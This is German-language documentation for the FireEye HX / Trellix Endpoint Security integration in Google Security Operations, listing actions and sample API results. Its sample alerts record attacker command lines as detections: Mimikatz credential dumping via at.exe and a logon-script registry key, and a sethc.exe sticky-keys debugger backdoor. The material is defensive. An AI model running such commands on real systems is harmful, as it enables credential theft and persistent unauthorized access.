FireEye HX
Integrationsversion: 17.0
FireEye HX-Integration in Google Security Operations konfigurieren
Eine detaillierte Anleitung zum Konfigurieren einer Integration in Google SecOps finden Sie unter Integrationen konfigurieren.
Integrationsparameter
Verwenden Sie die folgenden Parameter, um die Integration zu konfigurieren:
| Anzeigename des Parameters | Typ | Standardwert | Ist obligatorisch | Beschreibung |
|---|---|---|---|---|
| Instanzname | String | – | Nein | Name der Instanz, für die Sie die Integration konfigurieren möchten. |
| Beschreibung | String | – | Nein | Beschreibung der Instanz. |
| Server | String | https://x.x.x.x:<port> | Ja | Adresse der Trellix Endpoint Security-Instanz. |
| Nutzername | String | – | Ja | Die E-Mail-Adresse des Nutzers, die für die Verbindung zu Trellix Endpoint Security verwendet werden soll. |
| Passwort | Passwort | – | Ja | Das Passwort des entsprechenden Nutzers. |
| SSL überprüfen | Kästchen | Aktiviert | Nein | Aktivieren Sie dieses Kästchen, wenn für Ihre Trellix Endpoint Security-Verbindung eine SSL-Überprüfung erforderlich ist (standardmäßig aktiviert). |
| Remote ausführen | Kästchen | Deaktiviert | Nein | Aktivieren Sie das Feld, um die konfigurierte Integration remote auszuführen. Nachdem Sie das Kästchen angekreuzt haben, wird die Option zum Auswählen des Remote-Nutzers (Kundenservicemitarbeiters) angezeigt. |
Aktionen
Host-Containment abbrechen
Beschreibung
Erstellen Sie einen Cancel-Host, der eine Aufgabe auf dem Trellix Endpoint Security-Server basierend auf der Google SecOps-IP oder dem Google SecOps-Host enthält.
Ausführen am
Diese Aktion wird für die folgenden Einheiten ausgeführt:
- IP-Adresse
- Hostname
Aktionsergebnisse
Scriptergebnis
| Name des Scriptergebnisses | Wertoptionen | Beispiel |
|---|---|---|
| is_success | Wahr/falsch | is_success:False |
JSON-Ergebnis
N/A
Contain Host
Beschreibung
Erstellen Sie auf dem Trellix Endpoint Security-Server eine Aufgabe zum Eindämmen des Hosts, die auf der Google SecOps-IP oder auf Google SecOps-Entitäten basiert.
Parameter
| Parameter | Typ | Standardwert | Ist obligatorisch | Beschreibung |
|---|---|---|---|---|
| Eindämmung genehmigen | Kästchen | Deaktiviert | Nein | Geben Sie an, ob eine Containment-Anfrage für den Host automatisch genehmigt werden soll, um eine Contain-Host-Aufgabe auf dem Trellix Endpoint Security-Server zu erstellen. Wenn sie nicht automatisch genehmigt wird, kann eine Eindämmungsanfrage in der Trellix Endpoint Security-Webkonsole genehmigt werden. |
Ausführen am
Diese Aktion wird für die folgenden Einheiten ausgeführt:
- IP-Adresse
- Hostname
Aktionsergebnisse
Scriptergebnis
| Name des Scriptergebnisses | Wertoptionen | Beispiel |
|---|---|---|
| is_success | Wahr/falsch | is_success:False |
JSON-Ergebnis
N/A
Benachrichtigungen erhalten
Beschreibung
Sie erhalten Trellix Endpoint Security-Benachrichtigungen basierend auf der angegebenen Google SecOps-Entität und den Suchbedingungen. Die Aktion funktioniert für die Google SecOps-Entitäten „Host“ oder „IP“.
Parameter
| Anzeigename des Parameters | Typ | Standardwert | Ist obligatorisch | Beschreibung |
|---|---|---|---|---|
| Limit | Ganzzahl | – | Nein | Anzahl der Benachrichtigungen, die von der Aktion zurückgegeben werden sollen, z. B. 100. |
| Hat Modus für gemeinsame Nutzung | Drop-down-Liste (Standard = „Beliebig“) | _default = any_ | Nein | Filtern Sie Benachrichtigungen, die durch Indikatoren mit einem bestimmten Freigabemodus ausgelöst wurden. _Verfügbare Werte: „any“, „restricted“ und „unrestricted“._ |
| Lösungsstatus der Benachrichtigung | Drop-down-Liste (Standard = „Beliebig“) | _default = any_ | Nein | Benachrichtigungen nach dem Bearbeitungsstatus filtern Verfügbare Werte: _any, active_threat, alert, block, partial_block._ |
| Benachrichtigung in den letzten x Stunden gemeldet | Ganzzahl | – | Nein | Filtern Sie Warnungen, die in den letzten x Stunden gemeldet wurden, z. B. in den letzten 4 Stunden. |
| Benachrichtigungsquelle | Drop-down-Liste (Standard = „Beliebig“) | _default = any_ | Nein | Quelle der Benachrichtigung. Verfügbare Werte: „any“, „exd“ (exploit detection, Erkennung von Exploits), „mal“ (malware alert, Malware-Warnung), „ioc“ (indicator of compromise, Hinweis auf Manipulation). |
| Bedingungs-ID | String | – | Nein | Benachrichtigungen nach einer bestimmten Bedingungs-ID filtern |
| Benachrichtigungs-ID | String | – | Nein | Eine bestimmte Benachrichtigung anhand der Benachrichtigungs-ID zurückgeben |
Ausführen am
Diese Aktion wird für die folgenden Einheiten ausgeführt:
- IP-Adresse
- Hostname
Aktionsergebnisse
Scriptergebnis
| Name des Scriptergebnisses | Wertoptionen | Beispiel |
|---|---|---|
| is_success | Wahr/falsch | is_success:False |
JSON-Ergebnis
[
{
"EntityResult": [{
"indicator": {
"category": "Mandiant",
"display_name": "MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"name": "MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"url": "/hx/api/v3/indicators/mandiant/b7eae353_be50_44cf_8773_7067e9c66d7b",
"signature": null,
"_id": "b7eae353-be50-44cf-8773-7067e9c66d7b",
"uri_name": "b7eae353-be50-44cf-8773-7067e9c66d7b"
},
"event_id": 12880,
"event_values": {
"processEvent/processCmdLine": "at 13:00 \\\"C:\\\\TMP\\\\mim.exe sekurlsa::LogonPasswords > C:\\\\TMP\\\\o.txt\\\"",
"processEvent/parentPid": 4832,
"processEvent/md5": "e2a9c62b47f64525f7eb0cb8d637ff90",
"processEvent/processPath": "C:\\\\Windows\\\\System32\\\\at.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/timestamp": "2020-05-29T10:21:03.419Z",
"processEvent/startTime": "2020-05-29T10:21:03.419Z",
"processEvent/process": "at.exe",
"processEvent/username": "DOMAIN-COM\\\\Administrator",
"processEvent/pid": 7332,
"processEvent/parentProcessPath": "C:\\\\Windows\\\\System32\\\\cmd.exe",
"processEvent/eventType": "start"
},
"event_type": "processEvent",
"subtype": null,
"reported_at": "2020-05-29T10:24:05.410Z",
"decorators": [],
"md5values": ["e2a9c62b47f64525f7eb0cb8d637ff90"],
"appliance": {
"_id": "86B7F11ACF8D"
},
"agent": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"_id": "FqNP4ybCdrlfVqG3lrCvRP",
"containment_state": "normal"
},
"is_false_positive": false,
"event_at": "2020-05-29T10:21:03.419Z",
"source": "IOC",
"matched_at": "2020-05-29T10:23:22.000Z",
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/88",
"_id": 88,
"resolution": "ALERT",
"condition": {
"url": "/hx/api/v3/conditions/yirelRwhiuXlF0bQhTL4GA==",
"_id": "yirelRwhiuXlF0bQhTL4GA=="
},
"matched_source_alerts": []
}],
"Entity": "PC-01"
}
]
Details zur Benachrichtigungsgruppe abrufen
Beschreibung
Ruft die vollständigen Details einer Benachrichtigungsgruppe anhand ihrer ID ab.
Parameter
| Anzeigename des Parameters | Typ | Standardwert | Ist obligatorisch | Beschreibung |
|---|---|---|---|---|
| ID der Benachrichtigungsgruppen | String | – | Ja | Geben Sie eine durch Kommas getrennte Liste der IDs von Benachrichtigungsgruppen an, für die Sie Details abrufen möchten. |
Ausführen am
Diese Aktion wird nicht für Elemente ausgeführt, sondern hat einen obligatorischen Eingabeparameter.
Aktionsergebnisse
Scriptergebnis
| Name des Scriptergebnisses | Wertoptionen | Beispiel |
|---|---|---|
| is_success | Wahr/falsch | is_success:False |
JSON-Ergebnis
{
"details": [],
"route": "/hx/api/v3/alert_groups/id",
"data": {
"_id": "622d3688031aa40faa4bd86028841276",
"assessment": "[Process reg.exe started] MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
"file_full_path": "C:\\Windows\\System32\\reg.exe",
"first_event_at": "2020-08-06T06:32:55.761Z",
"last_event_at": "2020-08-06T06:32:55.761Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 729,
"agent": {
"_id": "QKQ0SinOZUbehz5AgFXQhX",
"url": "/hx/api/v3/hosts/QKQ0SinOZUbehz5AgFXQhX",
"hostname": "HW-HOST-024",
"containment_state": "normal"
},
"condition": {
"_id": "yirelRwhiuXlF0bQhTL4GA==",
"url": "/hx/api/v3/conditions/yirelRwhiuXlF0bQhTL4GA=="
},
"event_at": "2020-08-06T06:32:55.761+00:00",
"matched_at": "2020-08-06T06:37:55+00:00",
"reported_at": "2020-12-18T14:03:18.856+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"05cf3ce225b05b669e3118092f4c8eab"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/729",
"event_id": 207,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2020-08-06T06:32:55.761Z",
"processEvent/eventType": "start",
"processEvent/pid": 10356,
"processEvent/processPath": "C:\\Windows\\System32\\reg.exe",
"processEvent/process": "reg.exe",
"processEvent/parentPid": 9456,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2020-08-06T06:32:55.761Z",
"processEvent/md5": "05cf3ce225b05b669e3118092f4c8eab",
"processEvent/processCmdLine": "REG ADD HKCU\\Environment /f /v UserInitMprLogonScript /t REG_MULTI_SZ /d \"C:\\TMP\\mim.exe sekurlsa::LogonPasswords > C:\\TMP\\o.txt\""
},
"is_false_positive": false
},
"generic_alert_badge": null,
"generic_alert_label": null,
"stats": {
"events": 1
},
"url": "/hx/api/v3/alert_groups/622d3688031aa40faa4bd86028841276",
"created_at": "2020-12-18T14:03:24.535Z",
"acknowledgement": {
"acknowledged": false,
"acknowledged_by": null,
"acknowledged_time": null,
"comment": null,
"comment_update_time": null
},
"grouped_by": {
"condition_id": "yirelRwhiuXlF0bQhTL4GA==",
"detected_by": "ioc_engine",
"host": {
"_id": "QKQ0SinOZUbehz5AgFXQhX",
"url": "/hx/api/v3/hosts/QKQ0SinOZUbehz5AgFXQhX",
"hostname": "HW-HOST-024",
"primary_ip_address": "172.30.202.55"
}
}
},
"message": "OK"
}
Fall-Repository
| Ergebnistyp | Wert/Beschreibung | Typ |
| Ausgabemeldung* | Erfolg für 1 (is_success=true): Details zu den folgenden Benachrichtigungsgruppen in Trellix Endpoint Security wurden erfolgreich abgerufen: {alert group ids} Nicht erfolgreich für 1 (is_success=true): Die Aktion konnte keine Details zu den folgenden Benachrichtigungsgruppen in Trellix Endpoint Security abrufen: {alert group ids} Nicht erfolgreich für alle (is_success=false): Keine der angegebenen Alarmgruppen wurde in Trellix Endpoint Security gefunden. |
Allgemein |
| Fall-Repository | Name:Details zur Benachrichtigungsgruppe
|
Allgemein |
Benachrichtigungen in der Benachrichtigungsgruppe erhalten
Beschreibung
Alle Benachrichtigungen in der angegebenen Benachrichtigungsgruppe abrufen
Parameter
| Anzeigename des Parameters | Typ | Standardwert | Ist obligatorisch | Beschreibung |
|---|---|---|---|---|
| Benachrichtigungsgruppen-ID | String | – | Ja | Geben Sie eine durch Kommas getrennte Liste der IDs von Benachrichtigungsgruppen an, für die Sie Details abrufen möchten. |
| Limit | Ganzzahl | 50 | Nein | Geben Sie die maximale Anzahl von Benachrichtigungsauflistungen an, die für die Benachrichtigungsgruppe von der API zurückgegeben werden. Der Standardwert ist 50. |
Ausführen am
Diese Aktion wird nicht für Elemente ausgeführt, sondern hat einen obligatorischen Eingabeparameter.
Aktionsergebnisse
Scriptergebnis
| Name des Scriptergebnisses | Wertoptionen | Beispiel |
|---|---|---|
| is_success | Wahr/falsch | is_success:False |
JSON-Ergebnis
{
"data": {
"total": 2,
"query": {},
"sort": {},
"offset": 0,
"limit": 50,
"entries": [
{
"_id": 712,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"indicator": {
"_id": "f0e49db2-1c28-4529-a426-73251d92de7d",
"url": "/hx/api/v3/indicators/mandiant/f0e49db2_1c28_4529_a426_73251d92de7d",
"name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"uri_name": "f0e49db2-1c28-4529-a426-73251d92de7d",
"display_name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"signature": null,
"category": "Mandiant"
},
"event_at": "2020-12-10T08:04:09.521Z",
"matched_at": "2020-12-10T08:04:43.000Z",
"reported_at": "2020-12-10T08:04:49.607Z",
"source": "IOC",
"subtype": null,
"matched_source_alerts": [],
"resolution": "ALERT",
"is_false_positive": false,
"decorators": [],
"md5values": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/712",
"event_id": 853899,
"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T08:04:09.521Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8800,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"appliance": {
"_id": "86B7F11ACF8D"
}
},
{
"_id": 723,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"containment_state": "normal"
},
"condition": {
"_id": "2npvcLf_arxPaH717hQZ9g==",
"url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
},
"indicator": {
"_id": "f0e49db2-1c28-4529-a426-73251d92de7d",
"url": "/hx/api/v3/indicators/mandiant/f0e49db2_1c28_4529_a426_73251d92de7d",
"name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"uri_name": "f0e49db2-1c28-4529-a426-73251d92de7d",
"display_name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
"signature": null,
"category": "Mandiant"
},
"event_at": "2020-12-10T09:26:14.114Z",
"matched_at": "2020-12-10T09:26:56.000Z",
"reported_at": "2020-12-10T09:27:08.735Z",
"source": "IOC",
"subtype": null,
"matched_source_alerts": [],
"resolution": "ALERT",
"is_false_positive": false,
"decorators": [],
"md5values": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/723",
"event_id": 880771,
"event_type": "regKeyEvent",
"event_values": {
"regKeyEvent/timestamp": "2020-12-10T09:26:14.114Z",
"regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
"regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
"regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
"regKeyEvent/eventType": 1,
"regKeyEvent/pid": 8740,
"regKeyEvent/process": "reg.exe",
"regKeyEvent/processPath": "C:\\Windows\\System32",
"regKeyEvent/valueName": "Debugger",
"regKeyEvent/valueType": "REG_SZ",
"regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
"regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
"regKeyEvent/username": "FIREEYE-LAB\\Administrator"
},
"appliance": {
"_id": "86B7F11ACF8D"
}
}
]
},
"message": "OK",
"details": [],
"route": "/hx/api/v3/alert_groups/group_id/alerts"
}
Fall-Repository
| Ergebnistyp | Wert/Beschreibung | Typ |
|---|---|---|
| Ausgabemeldung* | Erfolg für 1 (is_success=true): Details zu den folgenden Alarmgruppen in Trellix Endpoint Security wurden erfolgreich abgerufen: {alert group ids} Nicht erfolgreich für 1 (is_success=true): Die Aktion konnte keine Details zu den folgenden Benachrichtigungsgruppen in Trellix Endpoint Security abrufen: {alert group ids} Nicht erfolgreich für alle (is_success=false): Keine der angegebenen Alarmgruppen wurde in Trellix Endpoint Security gefunden. |
Allgemein |
| Fall-Repository | Name: „Trellix Endpoint Security Alert Group +{alert_group_id) Alerts“
|
Allgemein |
Hostinformationen abrufen
Beschreibung
Google SecOps-Host- oder IP-Entitäten mit Informationen aus Trellix Endpoint Security anreichern.
Ausführen am
Diese Aktion wird für die folgenden Einheiten ausgeführt:
- IP-Adresse
- Hostname
Aktionsergebnisse
Scriptergebnis
| Name des Scriptergebnisses | Wertoptionen | Beispiel |
|---|---|---|
| is_success | Wahr/falsch | is_success:False |
JSON-Ergebnis
[
{
"EntityResult": {
"last_alert": {
"url": "/hx/api/v3/alerts/254",
"_id": 254
},
"domain": "EXAMPLE-COM",
"last_exploit_block_timestamp": null,
"containment_state": "normal",
"timezone": "\\u05e9\\u05e2\\u05d5\\u05df \\u05e7\\u05d9\\u05e5 \\u05d9\\u05e8\\u05d5\\u05e9\\u05dc\\u05d9\\u05dd",
"gmt_offset_seconds": 10800,
"initial_agent_checkin": "2020-05-29T10:11:12.022Z",
"stats": {
"alerting_conditions": 10,
"exploit_alerts": 0,
"acqs": 4,
"malware_false_positive_alerts": 0,
"alerts": 10,
"exploit_blocks": 0,
"false_positive_alerts": 0,
"malware_cleaned_count": 0,
"malware_alerts": 0,
"false_positive_alerts_by_source": {},
"generic_alerts": 0,
"malware_quarantined_count": 0
},
"primary_mac": "00-50-56-11-22-33",
"hostname": "HW-HOST-025",
"primary_ip_address": "1.1.1.1",
"last_audit_timestamp": "2020-06-01T09:10:38.752Z",
"last_alert_timestamp": "2020-06-01T08:02:30.817+00:00",
"containment_queued": false,
"sysinfo": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP/sysinfo"
},
"last_exploit_block": null,
"reported_clone": false,
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"excluded_from_containment": false,
"last_poll_timestamp": "2020-06-01T09:10:36.000Z",
"last_poll_ip": "1.1.1.1",
"containment_missing_software": false,
"_id": "FqNP4ybCdrlfVqG3lrCvRP",
"os": {
"kernel_version": null,
"platform": "win",
"patch_level": null,
"bitness": "64-bit",
"product_name": "Windows 10 Pro"
},
"agent_version": "32.30.0"
},
"Entity": "PC-01"
}
]
Indikator abrufen
Beschreibung
Informationen zu einem bestimmten Indikator vom Trellix Endpoint Security-Server abrufen.
Parameter
| Anzeigename des Parameters | Typ | Standardwert | Ist obligatorisch | Beschreibung |
|---|---|---|---|---|
| Indikatorkategorie | String | – | Ja | Geben Sie den uri_name-Wert der Indikatorkategorie an. Sie finden uri_name, indem Sie die Aktion „Get Indicators“ (Indikatoren abrufen) ausführen. |
| Indikatorname | String | – | Ja | Geben Sie den uri_name-Wert des Indikators an. Sie finden ihn, wenn Sie die Aktion „Get Indicators“ (Indikatoren abrufen) ausführen. |
Ausführen am
Diese Aktion wird für alle Elemente ausgeführt.
Aktionsergebnisse
Scriptergebnis
| Name des Scriptergebnisses | Wertoptionen | Beispiel |
|---|---|---|
| is_success | Wahr/falsch | is_success:False |
JSON-Ergebnis
{
"category": {
"url": "/hx/api/v3/indicator_categories/mandiant_unrestricted",
"_id": 7,
"uri_name": "mandiant_unrestricted",
"name": "Mandiant Unrestricted Intel",
"share_mode": "unrestricted"
},
"display_name": "FIREEYE END2END TEST",
"description": "IOC used for testing HX appliances and content packages to ensure that things work end to end",
"create_actor": {
"username": "mandiant",
"_id": 3
},
"active_since": "2020-05-28T13:08:08.513Z",
"url": "/hx/api/v3/indicators/mandiant_unrestricted/2b4753b0_9972_477e_ba16_1a7c29058cee",
"_revision": "20200528130929238120103414",
"create_text": "General_Windows_unrestricted_2020.05.270833",
"created_by": "General_Windows_unrestricted_2020.05.270833",
"update_actor": {
"username": "mandiant",
"_id": 3
},
"meta": null,
"signature": null,
"platforms": ["win\", \"osx\", \"linux"],
"stats": {
"source_alerts": 0,
"alerted_agents": 1,
"active_conditions": 7
},
"_id": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"uri_name": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"name": "FIREEYE END2END TEST"
}
Indikatoren abrufen
Beschreibung
Ruft Informationen zu Indikatoren für Sicherheitsrisiken (Indicators of Compromise, IOC) vom Trellix Endpoint Security-Server basierend auf den angegebenen Suchparametern ab.
Parameter
| Anzeigename des Parameters | Typ | Standardwert | Ist obligatorisch | Beschreibung |
|---|---|---|---|---|
| Indikatorkategorie | String | – | Nein | Die Kategorie des Indikators. |
| Suchbegriff | String | – | Nein | Der Suchbegriff kann ein beliebiger Name, eine beliebige Kategorie, Signatur, Quelle oder ein beliebiger Bedingungswert sein. |
| Limit | String | – | Nein | Anzahl der Indikatoren, die von der Aktion zurückgegeben werden sollen, z. B. 100. |
| Modus für gemeinsame Nutzung | Drop-down-Liste (Standard = „Beliebig“) | _default = any_ | Nein | Indikatoren nach einem bestimmten Freigabemodus filtern _Verfügbare Werte: any, restricted, unrestricted._ |
| Nach Feld sortieren | String | – | Nein | Sortiert die Ergebnisse nach dem angegebenen Feld in aufsteigender Reihenfolge. |
| Erstellt von | String | – | Nein | Indikatoren nach Autor filtern. |
| Zugehörige Warnungen | Kästchen | – | Nein | Geben Sie an, ob nur Indikatoren mit zugehörigen Benachrichtigungen zurückgegeben werden sollen. |
Ausführen am
Diese Aktion wird für alle Elemente ausgeführt.
Aktionsergebnisse
Scriptergebnis
| Name des Scriptergebnisses | Wertoptionen | Beispiel |
|---|---|---|
| is_success | Wahr/falsch | is_success:False |
JSON-Ergebnis
[
{
"category": {
"url": "/hx/api/v3/indicator_categories/mandiant_unrestricted",
"_id": 7,
"uri_name": "mandiant_unrestricted",
"name": "Mandiant Unrestricted Intel",
"share_mode": "unrestricted"
},
"display_name": "FIREEYE END2END TEST",
"description": "IOC used for testing HX appliances and content packages to ensure that things work end to end",
"create_actor": {
"username": "mandiant",
"_id": 3
},
"active_since": "2020-05-28T13:08:08.513Z",
"url": "/hx/api/v3/indicators/mandiant_unrestricted/2b4753b0_9972_477e_ba16_1a7c29058cee",
"_revision": "20200528130929238120103414",
"create_text": "General_Windows_unrestricted_2020.05.270833",
"created_by": "General_Windows_unrestricted_2020.05.270833",
"update_actor": {
"username": "mandiant",
"_id": 3
},
"meta": null,
"signature": null,
"platforms": ["win", "osx", "linux"],
"stats": {
"source_alerts": 0,
"alerted_agents": 1,
"active_conditions": 7
},
"_id": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"uri_name": "2b4753b0-9972-477e-ba16-1a7c29058cee",
"name": "FIREEYE END2END TEST"
}
]
Liste der Dateierwerbungen für Host abrufen
Beschreibung
Rufen Sie eine Liste der für den Host angeforderten Dateierfassungen vom Trellix Endpoint Security-Server ab. Die Aktion funktioniert für Google SecOps-Entitäten vom Typ „Host“ oder „IP“.
Parameter
| Anzeigename des Parameters | Typ | Standardwert | Ist obligatorisch | Beschreibung |
|---|---|---|---|---|
| Suchbegriff | String | – | Nein | Durchsucht alle Dateierfassungen für Hosts, die mit dem Trellix Endpoint Security-Server verbunden sind. Der search_term kann ein beliebiger Bedingungswert sein. |
| Limit | String | – | Nein | Wie viele Datensätze die Aktion zurückgeben soll, z. B. 100. |
| Filterfeld | String | – | Nein | Es werden nur Ergebnisse mit dem angegebenen Feldwert aufgeführt. Ergebnisse können nach der externen Korrelations-ID (external_id) gefiltert werden. |
Ausführen am
Diese Aktion wird für die folgenden Einheiten ausgeführt:
- IP-Adresse
- Hostname
Aktionsergebnisse
Scriptergebnis
| Name des Scriptergebnisses | Wertoptionen | Beispiel |
|---|---|---|
| is_success | Wahr/falsch | is_success:False |
JSON-Ergebnis
[
{
"EntityResult": [{
"comment": " ",
"zip_passphrase": "unzip-me",
"indicator": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"request_actor": {
"username": "admin",
"_id": 1000
},
"request_time": "2020-06-01T08:43:14.000Z",
"finish_time": "2020-06-01T08:46:39.156Z",
"_revision": "20200601084639156575147403",
"error_message": "The acquisition completed with issues.",
"req_use_api": false,
"alert": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"url": "/hx/api/v3/acqs/files/9",
"state": "COMPLETE",
"host": {
"url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
"_id":
"FqNP4ybCdrlfVqG3lrCvRP"
},
"req_filename": "reg.exe",
"req_path": "C:\\\\Windows\\\\System32",
"_id": 9,
"external_id": null,
"condition": {
"url": null,
"_id": "FqNP4ybCdrlfVqG3lrCvRP"
},
"md5": "601bddf7691c5af626a5719f1d7e35f1"
}],
"Entity": "PC-01"
}
]
„Enthält Malware“-Warnungen
Beschreibung
Prüfen Sie, ob auf dem Trellix Endpoint Security-Server Malware-Warnungen für die angegebenen Google SecOps-Host- oder IP-Entitäten aufgeführt sind.
Ausführen am
Diese Aktion wird für die folgenden Einheiten ausgeführt:
- IP-Adresse
- Hostname
Aktionsergebnisse
Scriptergebnis
| Name des Scriptergebnisses | Wertoptionen | Beispiel |
|---|---|---|
| is_success | Wahr/falsch | is_success:False |
JSON-Ergebnis
[
{
"EntityResult": {
"alerting_conditions": 10,
"exploit_alerts": 0,
"acqs": 4,
"malware_false_positive_alerts": 0,
"alerts": 10,
"exploit_blocks": 0,
"false_positive_alerts": 0,
"malware_cleaned_count": 0,
"malware_alerts": 0,
"false_positive_alerts_by_source": {},
"generic_alerts": 0,
"malware_quarantined_count": 0
},
"Entity": "PC-01"
}
]
Ping
Beschreibung
Testen Sie die Verbindung zum Trellix Endpoint Security-Server mit den Parametern, die auf der Seite für die Integrationskonfiguration auf dem Tab „Google Security Operations Marketplace“ angegeben sind.
Ausführen am
Diese Aktion wird für alle Elemente ausgeführt.
Aktionsergebnisse
Scriptergebnis
| Name des Scriptergebnisses | Wertoptionen | Beispiel |
|---|---|---|
| is_success | Wahr/falsch | is_success:False |
JSON-Ergebnis
N/A
Benachrichtigungsgruppen bestätigen
Beschreibung
Bestätigen Sie von Google SecOps bearbeitete Benachrichtigungsgruppen, um die Synchronisierung zwischen der HX-Plattform und Google SecOps zu verbessern.
Parameter
| Anzeigename des Parameters | Typ | Standardwert | Ist obligatorisch | Beschreibung |
|---|---|---|---|---|
| Benachrichtigungsgruppen-IDs | Durch Kommas getrennte Liste | – | Ja | Geben Sie die IDs der Benachrichtigungsgruppen an, die Sie bestätigen möchten, in einer durch Kommas getrennten Liste. |
| Bestätigung | DDL | Bestätigen | Ja | Geben Sie an, ob Sie die angegebenen Benachrichtigungsgruppen bestätigen oder die Bestätigung aufheben möchten. |
| Bestätigungskommentar | String | – | Nein | Geben Sie den Bestätigungskommentar an, den Sie den entsprechenden Benachrichtigungsgruppen hinzufügen möchten. |
| Limit | Ganzzahl | – | Nein | Geben Sie die maximale Anzahl von Warnungsgruppen an, die in den API-Ergebnissen im JSON-Format zurückgegeben werden sollen. |
Ausführen am
Diese Aktion wird nicht für Elemente ausgeführt, sondern hat einen obligatorischen Eingabeparameter.
Aktionsergebnisse
Scriptergebnis
| Name des Scriptergebnisses | Wertoptionen | Beispiel |
|---|---|---|
| is_success | Wahr/falsch | is_success:False |
JSON-Ergebnis
{
"data": {
"total": 2,
"query": {},
"sort": {},
"offset": 0,
"limit": 50,
"entries": [
{
"_id": "4532f4d8d50ab50a7830e2823ac488fd",
"assessment": "[Process powershell.exe started] POWERSHELL DOWNLOADER (METHODOLOGY)",
"file_full_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"first_event_at": "2020-08-17T12:03:38.496Z",
"last_event_at": "2020-12-10T08:02:22.561Z",
"dispositions": [],
"source": "IOC",
"has_fp_disposition": false,
"last_alert": {
"_id": 718,
"agent": {
"_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
"url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
"hostname": "HW-HOST-FY01",
"containment_state": "normal"
},
"condition": {
"_id": "yQjMv_j5PKfjL8Qu5uSm4A==",
"url": "/hx/api/v3/conditions/yQjMv_j5PKfjL8Qu5uSm4A=="
},
"event_at": "2020-08-17T12:03:38.496+00:00",
"matched_at": "2020-12-10T09:26:55+00:00",
"reported_at": "2020-12-10T09:27:08.624+00:00",
"source": "IOC",
"resolution": "ALERT",
"decorators": [],
"md5values": [
"cda48fc75952ad12d99e526d0b6bf70a"
],
"decorator_sources": [],
"decorator_statuses": [],
"url": "/hx/api/v3/alerts/718",
"event_id": 39882,
"event_type": "processEvent",
"event_values": {
"processEvent/timestamp": "2020-08-17T12:03:38.496Z",
"processEvent/eventType": "start",
"processEvent/pid": 9896,
"processEvent/processPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"processEvent/process": "powershell.exe",
"processEvent/parentPid": 5560,
"processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
"processEvent/parentProcess": "cmd.exe",
"processEvent/username": "FIREEYE-LAB\\Administrator",
"processEvent/startTime": "2020-08-17T12:03:38.496Z",
